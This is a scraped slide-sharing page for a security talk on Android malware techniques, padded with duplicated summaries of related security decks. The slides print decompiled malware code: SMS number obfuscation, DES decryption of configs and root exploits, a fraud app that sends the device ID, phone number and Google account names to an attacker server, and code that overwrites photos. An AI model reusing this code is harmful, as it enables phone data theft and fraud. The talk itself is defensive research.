Attackers are starting to move on from simple attacks, mainly because users are starting to figure out that the free adult entertainment or chat app shouldn't be sending SMS messages to expensive numbers. They're leveraging techniques from PC malware like server-side polymorphism, vulnerability exploits, botnets and network updates, and preemptive/direct attacks against security software.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
The document summarizes Determina's Vulnerability Protection Suite, which uses patented technology to stop both known and unknown (zero-day) attacks without needing updates, signatures, or behavior modeling. It focuses on vulnerability prevention rather than attack detection. The core technologies include the Managed Program Execution Engine, Memory Firewall, and LiveShield, which provide zero-day endpoint protection.
This document discusses using machine learning to detect ransomware through analyzing microbehaviors rather than static signatures. It introduces the concept of using machine learning for cybersecurity and labeling data to help algorithms learn. The document then discusses modeling ransomware behaviors like file system modifications and callbacks. It outlines a plan to take labeled exploit and benign traffic data, extract microbehaviors, use machine learning to detect anomalies, and generate indicators of compromise.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
This document discusses mobile security threats and attacker mindsets. It notes that mobile malware primarily impacts Android due to its fragmented ecosystem and slow patching. Exploitation focuses on gaining control of applications or baseband processors, which have few defenses and high-value data. The document advises software vendors to implement stronger mitigations, developers to better isolate sensitive data, and policymakers to recognize diverse mobile threats and segregate devices from corporate networks. It argues that understanding attacker goals and what data needs protection is key to effective security.
This document discusses the stages of targeted attacks and the techniques used at each stage. It begins by outlining the 6 main stages of targeted attacks: 1) intelligence gathering, 2) point of entry, 3) command and control communication, 4) lateral movement, 5) data discovery, and 6) data exfiltration. For each stage, it describes common tactics attackers use, such as spearphishing for the point of entry or using encrypted communications over the Tor network for exfiltration. The document emphasizes that comprehensive security measures are needed to detect threats across all stages of attack.
Automotive Cybersecurity: Test Like a HackerForAllSecure
Learn the techniques used by award-winning hacking teams (as well as in some real-world attacks) to identify and exploit vulnerabilities in OEM components and other automotive software. This presentation covers fundamental principles, as well as how to easily incorporate these techniques into unit or functional test stages - bringing an extra layer of protection to connected automobiles. We'll cover both how to best fit this type of testing into your pipeline to maximize speed and coverage, as well as discuss how to fit this offensive cyber security approach alongside your existing vulnerability scanning programs. Whether you're a vehicle manufacturer, integrator, or OEM - we'll discuss how to leverage hacking-based security techniques to improve protection across the supply chain and keep vehicles and drivers safer. What we'll cover:
- Successful exploits of components and vehicles - what these attacks had in common
- Layering offensive techniques atop existing security programs - what to do and what to avoid
- How to test integrated systems with multiple components from different OEMs working in tandem
- Integrating offensive testing into different stages in software development and component integration
Originally presented at https://www.automotive-iq.com/events-automotive-cybersecurity
The document summarizes Determina's Vulnerability Protection Suite, which uses patented technology to stop both known and unknown (zero-day) attacks without needing updates, signatures, or behavior modeling. It focuses on vulnerability prevention rather than attack detection. The core technologies include the Managed Program Execution Engine, Memory Firewall, and LiveShield, which provide zero-day endpoint protection.
This document discusses using machine learning to detect ransomware through analyzing microbehaviors rather than static signatures. It introduces the concept of using machine learning for cybersecurity and labeling data to help algorithms learn. The document then discusses modeling ransomware behaviors like file system modifications and callbacks. It outlines a plan to take labeled exploit and benign traffic data, extract microbehaviors, use machine learning to detect anomalies, and generate indicators of compromise.
Jon Noble. Jon will give a brief overview of why you should consider security as part of your CloudStack deployment, why your approach to security needs to be different than in a traditional environment, and also talk about some of the motives behind the attacks – why they attack you and what they do once they have compromised a system.
This document discusses mobile security threats and attacker mindsets. It notes that mobile malware primarily impacts Android due to its fragmented ecosystem and slow patching. Exploitation focuses on gaining control of applications or baseband processors, which have few defenses and high-value data. The document advises software vendors to implement stronger mitigations, developers to better isolate sensitive data, and policymakers to recognize diverse mobile threats and segregate devices from corporate networks. It argues that understanding attacker goals and what data needs protection is key to effective security.
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Web security involves protecting information transmitted over the internet from attacks like viruses, worms, trojans, ransomware, and keyloggers. Users can help secure themselves by using antivirus software, avoiding phishing scams, and reporting spam. Larger attacks often involve botnets, which are networks of infected computers that can overwhelm websites and services with traffic through distributed denial of service attacks.
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
How to hide your browser 0-day @ DisobeyZoltan Balazs
1. The document describes a method called #IRONSQUIRREL for delivering browser exploits in an encrypted format using elliptic curve Diffie-Hellman key exchange to prevent detection and analysis.
2. It was implemented in exploit kits like Angler to prevent reverse engineering of zero-day exploits and leakage of exploit code. The encrypted delivery prevents network-based detection and replay of the exploit.
3. The document provides details on how #IRONSQUIRREL works and improves on previous encrypted delivery methods. It also discusses challenges and techniques for analysts to detect and analyze such encrypted exploits, as well as recommendations for attackers to strengthen #IRONSQUIRREL against analysis.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
"There are billions of ARM Cortex M based SOC being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection in to the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered and it will be two parts:
The first is security measurement build within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
This document discusses hacking and methods for defending against it. It provides background on common hacking techniques like smurfing and spoofing. It also lists estimated costs of major computer worms and viruses. The document demonstrates hacking methodology, including gathering target information, identifying services, exploiting vulnerabilities, and preventing attacks. It recommends defenses like firewalls, intrusion detection systems, and keeping software patched.
The document discusses penetration testing using Metasploit. It begins by defining penetration testing and why it is important for security. It then provides an overview of Metasploit, explaining what it is and some key terminology. The document demonstrates a sample penetration test against a virtual network, using Metasploit to exploit a Windows vulnerability. It evaluates the impact and recommends countermeasures like patching, code reviews, and periodic testing. The goal is to show how Metasploit can be used to test network security by simulating real-world attacks.
This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.
This document discusses the topic of computer hacking. It begins by defining hacking and discussing the different types of hackers, including white hat, black hat, and gray hat hackers. It then covers hacking techniques such as port scanning, social engineering, and brute force attacks. The document provides an overview of how hackers operate and highlights both advantages and disadvantages of hacking.
Presentation by Saurabh Harit att he mobile security summit in johannesburg 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Digital Signage Systems - The Modern Hacker's OutreachZero Science Lab
The document provides information on several digital signage systems and related security issues, including:
1) Eight cases of vulnerabilities found in different digital signage systems are described, such as remote code execution, SQL injection, authentication bypass, and more.
2) Common attack vectors for digital signage systems are explained, including exposed management interfaces, known vulnerabilities, default or hard-coded credentials, lack of authentication and authorization, and more.
3) Details are given on specific exploits against systems like Cayin, QiHang Media, UBICOD Medivision, and others, demonstrating privilege escalation, unauthorized file access and deletion, and in some cases gaining full remote code execution.
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
There is no doubt that mobile contactless payments has grown exponentially and Host Card Emulation – the possibility to emulate payment cards on a mobile device, without dependency on special Secure Element hardware, has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile in your application. Obviously vendors promise “highest level of security” – including: card data tokenization, “secure element in the cloud”, device fingerprinting, phone unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince implementing bank that it is technically impossible to “clone” a virtual card from owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device, every time caused confusion and uncertainty the least. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With introduction of root-exploiting financial malware, they already have technical means to attack HCE. Therefore it is now crucial to understand associated risks, and properly plan mitigation ahead. This presentation will start with a short introduction on HCE – including “ISIS”‘s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences in hardware Secure Element. We will cover several possibilities to attack HCE including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Brick all the internet of things!(with notes)Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
Mais conteúdo relacionado
Semelhante a Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
The Internet of Fails - Mark Stanislav, Senior Security Consultant, Rapid7Rapid7
The Internet of Fails - Where IoT (the Internet of Things) has gone wrong and how we’re making it right. By Mark Stanislav @mstanislav, Senior Security Consultant, Rapid7
Web security involves protecting information transmitted over the internet from attacks like viruses, worms, trojans, ransomware, and keyloggers. Users can help secure themselves by using antivirus software, avoiding phishing scams, and reporting spam. Larger attacks often involve botnets, which are networks of infected computers that can overwhelm websites and services with traffic through distributed denial of service attacks.
Secure Software: Action, Comedy or Drama? (2017 edition)Peter Sabev
If they made movies about the most important software security issues, they could be put into five titles: Insecure Interface, Insufficient Authentication, Security Misconfiguration, Lack of Transport Encryption and Privacy Concerns. What are the action, comedy and drama parts in software security nowadays? A talk presented on IT-Weekend event in Ruse, Bulgaria (2017)
SANSFIRE18: War Stories on Using Automated Threat Intelligence for DefenseJohn Bambenek
Between limited resources and a lack of trained professionals on one hand and the increasing quantity and quality of attacks on the other, securing enterprises and responding to incidents has placed defenders on the losing end of a digital arms race. Even managing the amounts of threat data and open-source intelligence has become a challenge.
This talk will cover the possibilities and perils of integrating all the various sources of threat intelligence data to protect an organization. With all the various open-source and paid-source data, simply dumping it all into a firewall or DNS RPZ zone can be problematic. What to do about compromised websites or shared hosting environments? What about DGA domains that use full words and may collide with actual innocent websites? What about how to handle threat data that is lacking in context to make appropriate decisions on its validity and accuracy? This talk will present several case studies in how these problems can be tackled and how using multi-domain analysis can help reduce the risk and maximize the value of automated protection using these types of data.
The document discusses cybersecurity issues related to IoT devices. It begins by describing the 2016 Mirai botnet attacks, which exploited vulnerabilities in IoT devices like IP cameras and DVRs to take down major websites. The document then analyzes the current security situations of IoT, finding that many devices have vulnerabilities due to a lack of focus on security by manufacturers. It also notes that IoT devices could potentially be used as "weapons of mass destruction" due to their ubiquity, connectivity and potential access to users' daily lives. The rest of the document examines common vulnerabilities and attack vectors in IoT devices.
How to hide your browser 0-day @ DisobeyZoltan Balazs
1. The document describes a method called #IRONSQUIRREL for delivering browser exploits in an encrypted format using elliptic curve Diffie-Hellman key exchange to prevent detection and analysis.
2. It was implemented in exploit kits like Angler to prevent reverse engineering of zero-day exploits and leakage of exploit code. The encrypted delivery prevents network-based detection and replay of the exploit.
3. The document provides details on how #IRONSQUIRREL works and improves on previous encrypted delivery methods. It also discusses challenges and techniques for analysts to detect and analyze such encrypted exploits, as well as recommendations for attackers to strengthen #IRONSQUIRREL against analysis.
The State of Credential Stuffing and the Future of Account Takeovers.Jarrod Overson
Jarrod Overson discusses the evolution of credential stuffing attacks and where they may go in the future. He summarizes that credential stuffing started as basic automated login attempts but has evolved through generations as defenses were put in place, such as CAPTCHAs and behavior analysis. The next generation involves more sophisticated imitation attacks that flawlessly emulate human behavior using real device fingerprints to blend in. Beyond credential stuffing, malware may start scraping user accounts and environments directly from infected machines. As defenses raise the cost of attacks, fraudsters will diversify methods to preserve the value of valid accounts and user data.
Hacking is a term used to refer to activities aimed at exploiting security flaws to obtain critical information for gaining access to secured networks.
Cracking Into Embedded Devices - HACK.LU 2K8guest441c58b71
The document discusses offensive techniques for compromising embedded devices, focusing on exploiting vulnerabilities in HTTP, UPnP, SNMP, and Wi-Fi to gain remote access. Many examples are provided of specific devices that were compromised through bugs like cross-site request forgery, privilege escalation flaws, and password leaks. The goal of the research is to show how embedded devices are easier to hack than general purpose systems and can be used as stepping stones into internal corporate networks.
Your Peripheral Has Planted Malware—An Exploit of NXP SOCs VulnerabilityPriyanka Aash
"There are billions of ARM Cortex M based SOC being deployed in embedded systems. Most of these devices are Internet ready and definitely security is always the main concern. Vendors would always apply security measurements into the ARM Cortex M product for few major reasons: 1) People will not be able to copy and replicate the product; 2) License control for the hardware and software; 3) Prevent malicious code injection in to the firmware. Vendors normally rely on the security measurements built within the chip (unique ID number/signature) or security measurements built around the chip (secure boot).
In this talk, we will share the ARM Cortex M SOC vulnerability that we discovered and it will be two parts:
The first is security measurement build within the SOC and how we break it. We could gain control of changing the SOC unique ID and write the firmware or even turn the device into a trojan or bot.
The second is security measure built around the SOC and how we break the Secure Boot elements and write into the firmware."
The TheFatrat is an easy tool to generate backdoor’s with msfvenom (a part
from metasploit framework) and easy post exploitation attack. This tool
compiles a malware with popular payload and then the compiled malware can
be execute on android, windows, Linux. The malware that created with this tool
also have an ability to bypass most AV software protection. Bypassing the Anti-
Virus or Security Software will allow for a metasploit session between the
attacker and the target without Anti-Virus detecting the malicious payload and
flagging a warning back to the user.
This document discusses hacking and methods for defending against it. It provides background on common hacking techniques like smurfing and spoofing. It also lists estimated costs of major computer worms and viruses. The document demonstrates hacking methodology, including gathering target information, identifying services, exploiting vulnerabilities, and preventing attacks. It recommends defenses like firewalls, intrusion detection systems, and keeping software patched.
The document discusses penetration testing using Metasploit. It begins by defining penetration testing and why it is important for security. It then provides an overview of Metasploit, explaining what it is and some key terminology. The document demonstrates a sample penetration test against a virtual network, using Metasploit to exploit a Windows vulnerability. It evaluates the impact and recommends countermeasures like patching, code reviews, and periodic testing. The goal is to show how Metasploit can be used to test network security by simulating real-world attacks.
This document contains a presentation on cyber security, ethical hacking, and penetration testing. It discusses various cyber threats like hacking, malware, and phishing. It then provides details on mobile hacking using AndroRAT to remotely control an Android phone. It also covers social media hacking techniques and how to conduct phishing attacks on sites like Facebook. The document concludes with a section on ransomware that demonstrates encrypting and decrypting files with a Python script.
This document discusses the topic of computer hacking. It begins by defining hacking and discussing the different types of hackers, including white hat, black hat, and gray hat hackers. It then covers hacking techniques such as port scanning, social engineering, and brute force attacks. The document provides an overview of how hackers operate and highlights both advantages and disadvantages of hacking.
Presentation by Saurabh Harit att he mobile security summit in johannesburg 2011.
This presentation is about security on the iPhone and Android platforms. The presentation begins with a discussion on decrypting iPhone apps and its implications. The Android security model is discussed. The presentation ends with a series of discussions on practical Android attacks.
Digital Signage Systems - The Modern Hacker's OutreachZero Science Lab
The document provides information on several digital signage systems and related security issues, including:
1) Eight cases of vulnerabilities found in different digital signage systems are described, such as remote code execution, SQL injection, authentication bypass, and more.
2) Common attack vectors for digital signage systems are explained, including exposed management interfaces, known vulnerabilities, default or hard-coded credentials, lack of authentication and authorization, and more.
3) Details are given on specific exploits against systems like Cayin, QiHang Media, UBICOD Medivision, and others, demonstrating privilege escalation, unauthorized file access and deletion, and in some cases gaining full remote code execution.
Cant touch this: cloning any Android HCE contactless cardSlawomir Jasek
There is no doubt that mobile contactless payments has grown exponentially and Host Card Emulation – the possibility to emulate payment cards on a mobile device, without dependency on special Secure Element hardware, has also significantly boosted the number of applications.
HCE support for Android is usually delivered as an external, certified “black-box” library to compile in your application. Obviously vendors promise “highest level of security” – including: card data tokenization, “secure element in the cloud”, device fingerprinting, phone unlock requirement, code obfuscation, additional authorization, etc. For mobile payments, they often successfully convince implementing bank that it is technically impossible to “clone” a virtual card from owner’s device to another one.
Based on several assessments, we have noticed that even IT security representatives were surprised by the possibilities of mobile malware to attack the process. Not to mention risk departments, which took into consideration only a few limited-value fraudulent transactions made by an accidental thief using a stolen phone. Therefore, delivering the PoC demo of card cloning to a different device, every time caused confusion and uncertainty the least. Furthermore, proving that the intruder is also able to renew virtual card tokens, or make payments for higher amounts, turned out to be a shock.
With introduction of root-exploiting financial malware, they already have technical means to attack HCE. Therefore it is now crucial to understand associated risks, and properly plan mitigation ahead. This presentation will start with a short introduction on HCE – including “ISIS”‘s role in its complicated history, current coverage and growth predictions, basics of operation, typical infrastructure and differences in hardware Secure Element. We will cover several possibilities to attack HCE including a universal method of cloning any Android contactless payment (including Google’s own Android Pay) to a different device. Several layers of security mechanisms to mitigate the risk will be presented along with some statistics on methods used by current applications. The audience will leave with a deep understanding of HCE technology and its limitations, along with exemplary solutions to potential problems.
Semelhante a Isn't it all just SMS-sending trojans?: Real Advances in Android Malware (20)
Brick all the internet of things!(with notes)Jimmy Shah
Recently someone released a worm on the Internet that targeted IoT devices. In the past similar worms turned your Internet connected cameras and DVRs into nodes in a massive botnet. This time it used the same entry points into your devices to brick them. The better to prevent them from possibly being turned into weapons of mass denial of service.
We'll cover why that's a Bad Idea. And what are more constructive ways to get IoT/Internet-enabled embedded device manufacturers and vulnerability researchers to sit down at the same table.
There's no S(ecurity) in IoT: This is why we can't sleepJimmy Shah
IoT devices are embedded systems. Essentially "[a] computer small enough to fit in a pocket". One wouldn’t put a computer on the Internet without at least considering securing it, yet security for IoT devices is quite often an afterthought.
BYOD is now BYOT (Bring Your Own Threat) – Current Trends in Mobile APTJimmy Shah
Mobile devices are not simply PCs. While one knows to look for an Advanced Persistent Threat(APT) on their desktop endpoints, mobile tends to be ignored. Setting up an MDM solution is not enough. Installing AV on as many devices as possible is not enough. The holes in the net are still too wide; attackers have more options than just malicious apps for getting on your network.
Topics covered will be:
How attackers are moving to mobile in order to bypass traditional protection.
Apps are only one part of the problem. Documents, email, messaging are still left wide open
Bypassing Mobile Antivirus
Bypassing MDM, MAM and Containers
Attackers are turning from apps to exploits.
Finally we’ll cover what to do next – how to effectively deal with Mobile APT.
Solar Powered Parking Meters - An IoT thought experimentJimmy Shah
The Internet of Things is not as complex as one would think. Objects(e.g. Power meters, Fridge computers, etc.) or "Things" don;t have their own Internet, instead they "speak" to each other over the same Internet we all use. There lies their vulnerability. Assuming that since the machines will only talk to each other, that no one will eavesdrop or intrude on their conversation. Security researchers have a saying, "Security through Obscurity is no Security".
The presentation shows how the Internet of Things' veil of obscurity can be pierced by an attacker(or more likely a Security Researcher) would assess a particular Smart Parking Meter ecosystem. Only open source intelligence(OSINT)[e.g. patents, newspaper articles] was used to compile the information on:
* parking meters
* mesh networking
* machine2machine(m2m) SIMs
* management consoles
* RF usage
Mobile malware analysis with the a.r.e. vmJimmy Shah
This document describes tools included in the Android Reverse Engineering (A.R.E.) virtual machine from the Honeynet Project for analyzing Android malware. The A.R.E. VM includes tools for decompiling Android apps, disassembling Dalvik bytecode, inspecting app files and permissions, and monitoring apps dynamically in an instrumented Android virtual machine. It allows static and dynamic analysis of Android apps to identify malicious behavior and understand app functionality.
Viruses on mobile platforms why we don't/don't we have viruses on android_Jimmy Shah
This presentation will discuss the resources available to attackers to write Android viruses, including methods of infecting executables, gaining control from the original app and avoiding detection.
Mobile malware heuristics the path from 'eh' to pretty good'Jimmy Shah
The 'Platypus' talk
Malware on mobile phones is rapidly increasing. There are many reasons for this, but the primary one is the ease of monetizing malware on mobile phones, Attackers are incentivized to create more malware faster and cheaper. They are overwhelming the limited resources of malware researchers with this glut of cheap and "good enough" malware. Malware can be identified by humans, but there is insufficient time to handle all that is released daily by malware writers. There is a need to develop both better heuristics and the tools that let an analyst separate the wheat from the chaff. The presentation will cover not just the development of heuristics for mobile malware, but also its path from simple detection to more advanced and more successful(i.e fewer false positives) detection. Along the way we will cover the missteps and pitfalls that slow the development of automation.
Smartphone Ownage: The state of mobile botnets and rootkitsJimmy Shah
This document discusses mobile botnets and rootkits. It begins by introducing the author and their work in mobile malware analysis. Various examples of existing mobile malware are provided, including botnets that coordinate infected devices and rootkits that hide on phones. The document outlines characteristics of botnets like command and control and how they are used for attacks. It also defines rootkits and provides examples found in the wild for Symbian and other mobile platforms. Finally, it discusses the potential for future mobile botnets and rootkits as the capabilities of smartphones increase.
Smartphone Ownage: The state of mobile botnets and rootkits
Isn't it all just SMS-sending trojans?: Real Advances in Android Malware
1. McAfee Confidential—Internal Use Only
Isn't it all just SMS-sending trojans?:
Real advances in Android Malware
Jimmy Shah
Mobile Security Researcher
6. Attacker Tricks - Encryption
• Simple
– Obfuscations
• Hiding SMS numbers/message text within plaintext HTML files
– Substitution cipher
• Config file containing encrypted SMS numbers/message text
<link rel="stylesheet" type="text/css" href="/en/shar
ed/core/2/css/css.ashx?sc=/en/us/site.config&pt=cspMscomHomePage&c=cspMscomSiteBrand;cspSearchComponent
;cspMscomFeaturePanel;cspMscomMasterNavigation;[<SMS#>:<MSG>]cspMscomNewsBand;cspVerticalRolloverTab;cspAdControl;cspMscomVe
rticalTab;cspSilverGate" /><script type="text/javascript" src="http//i3.microsoft.com/library/svy/broker.js">
</script><meta name="SearchTitle" content="Microsoft.com" scheme="" /><meta name="Description" content="Get
product information, support, and news from Microsoft." scheme="" /><meta name="Title" content="Microsoft.c
<SMS#>::<MSG>::241.55руб.
<SMS#>::<MSG>::173.88руб.
<SMS#>::<MSG>::86.00руб.
7. Attacker Tricks - Encryption
• Complex
– Symmetric cipher
• DES
• Encrypt URL queries and C&C commands
• Encrypt/decrypt config file
– URLs, next connect time
– Encrypt/decrypt C&C commands
– Decrypt root exploits
byte abyte1[] = k.b;
DESKeySpec deskeyspec = new DESKeySpec(abyte1);
javax.crypto.SecretKey secretkey = SecretKeyFactory.getInstance("DES").generateSecret(deskeyspec);
Cipher cipher = Cipher.getInstance("DES");
b = cipher;
cipher.init(2, secretkey);
8. Attacker Tricks – Fraud
• Pretending to be a legitimate app
– Not the same as injecting malicious code
– New or reused code that simulates the real app
• Includes malicious functions
• Almost just malicious code
./com/example/android/service/KitchenTimerService$KitchenTimerBinder.class
./com/example/android/service/R$id.class
./com/example/android/service/R$raw.class
./com/example/android/service/Main$KitchenTimerReceiver.class
./com/example/android/service/KitchenTimerService$2.class
./com/example/android/service/R$attr.class
./com/example/android/service/R$layout.class
./com/example/android/service/R.class
./com/example/android/service/Main.class
./com/example/android/service/R$drawable.class
./com/example/android/service/KitchenTimerService$1.class
./com/example/android/service/KitchenTimerService.class
./com/example/android/service/Main$1.class
./com/example/android/service/R$string.class
./token/bot/StartSettings.class
./token/bot/WebApi.class
./token/bot/CatchResult.class
./token/bot/SendSmsResult.class
./token/bot/SettingsSet.class
./token/bot/ScreenItem.class
./token/bot/AutorunReceiver.class
./token/bot/ServerResponse.class
./token/bot/MainActivity.class
./token/bot/ThreadOperation.class
./token/bot/AlarmReceiver.class
./token/bot/ThreadOperationListener.class
./token/bot/SmsReciver.class
./token/bot/MainApplication.class
./token/bot/MainService.class
./token/bot/SmsItem.class
./token/bot/HttpParam.class
./token/bot/Settings.class
./token/bot/UpdateActivity.class
./token/bot/MainActivity$1.class
Android/OneClickFraud
Android/FakeToken
10. Attacker Tricks – Fraud
• Android/OneClickFraud
– Fake adult entertainment app
• App asks for the user to pay for a subscription to the adult site
– Repeats every 5 minutes
public void onReceive(Context paramContext, Intent paramIntent)
{
kitchenTimerService.schedule(300000L);
setContentView(2130903040);
Account[] arrayOfAccount;
11. Attacker Tricks – Fraud
• Android/OneClickFraud
– Sends user information including Google account to the attacker
if (ctf.intValue() == 0)
{
Main localMain = Main.this;
Integer localInteger = Integer.valueOf(1);
localMain.ctf = localInteger;
TelephonyManager localTelephonyManager = (TelephonyManager)getSystemService("phone");
arrayOfAccount = AccountManager.get(Main.this).getAccounts();
str1 = "";
int i = arrayOfAccount.length;
j = 0;
if (j >= i)
{
String str2 = doPost("http://<removed>", "");
StringBuilder localStringBuilder1 = new StringBuilder("http://<removed>");
String str3 = localTelephonyManager.getDeviceId();
StringBuilder localStringBuilder2 = localStringBuilder1.append(str3).append("&telno=");
String str4 = localTelephonyManager.getLine1Number();
Uri localUri1 = Uri.parse(str4 + "&m_addr=" + str1 + "&usr_id=" + str2);
Intent localIntent1 = new Intent("android.intent.action.VIEW", localUri1);
startActivity(localIntent1);
boolean bool = moveTaskToBack(1);
}
}
12. 4/19/1212
Attacker Tricks - Injecting code
• Android/Moghava.A
– Malicious code injected into a legitimate app
• Recipes for Iranian meals
13. 4/19/1213
Attacker Tricks - Injecting code
• Android/Moghava.A
– Real virus
• Overwriting file infector
– Not executable files, just image files
» Specifically all of your JPGs
» Designed to “photo bomb” all your photos with the Ayotollah
Khomeni
• Code injection:
– Buggy
• Doesn't check if it's infected a file before
./com/Moghava/kicker.smali
./com/Moghava/stamper$1.smali
./com/Moghava/stamper$1$1.smali
./com/Moghava/stamper.smali
./ir/sharif/iranianfoods/R$attr.smali
./ir/sharif/iranianfoods/R$styleable.smali
./ir/sharif/iranianfoods/R$menu.smali
./ir/sharif/iranianfoods/ListItemAdapter.smali
./ir/sharif/iranianfoods/IranData.smali
./ir/sharif/iranianfoods/Touch$AddImgAdp.smali
./ir/sharif/iranianfoods/TabHostActivity.smali
./ir/sharif/iranianfoods/Constants.smali
14. 4/19/1214
Attacker Tricks - Injecting code
localBitmap1 = BitmapFactory.decodeResource(this$0.getResources(), 2130837505);
localBitmap2 = BitmapFactory.decodeFile(localFile2.getPath());
int m = localBitmap2.getWidth();
int n = localBitmap1.getWidth();
